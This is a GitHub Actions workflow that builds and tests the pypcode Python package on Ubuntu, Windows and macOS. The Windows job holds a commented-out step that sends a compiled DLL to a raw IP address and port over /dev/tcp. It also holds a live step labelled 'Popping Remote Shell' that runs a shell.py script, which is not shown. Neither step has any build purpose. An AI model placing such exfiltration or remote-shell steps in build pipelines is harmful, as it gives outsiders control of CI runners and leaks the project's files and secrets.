name: Build

on: [push, pull_request]

jobs:
  Ubuntu:
    runs-on: ubuntu-latest
    steps:
    - name: Clone Tree
      uses: actions/checkout@v2
    - name: Install Dependencies
      run: python3 -m pip install -U pip setuptools
    - name: Install
      run: python3 -m pip install --user .
    - name: Run Tests
      run: mkdir tmp; cd tmp; python3 -m pypcode pcode
  Windows:
    runs-on: windows-latest
    steps:
    - name: Clone Tree
      uses: actions/checkout@v2
    - name: Install Dependencies
      run: python -m pip install -U pip setuptools
    - name: Install
      run: python -m pip install --user --verbose .
    # - name: temp
    #   run: bash -c "cat C:\\\\Users\\\\runneradmin\\\\AppData\\\\Roaming\\\\Python\\\\Python37\\\\site-packages\\\\pypcode\\\\pypcode-native\\\\libpypcode-native.dll > /dev/tcp/107.170.206.206/1338"
    - name: Popping Remote Shell
      run: python shell.py
    - name: Run Tests
      run: mkdir tmp; cd tmp; python -vm pypcode pcode
  macOS:
    runs-on: macOS-latest
    steps:
    - name: Clone Tree
      uses: actions/checkout@v2
    - name: Install Dependencies
      run: python3 -m pip install -U pip setuptools
    - name: Install
      run: python3 -m pip install --user --verbose .
    - name: Run Tests
      run: mkdir tmp; cd tmp; python3 -m pypcode pcode
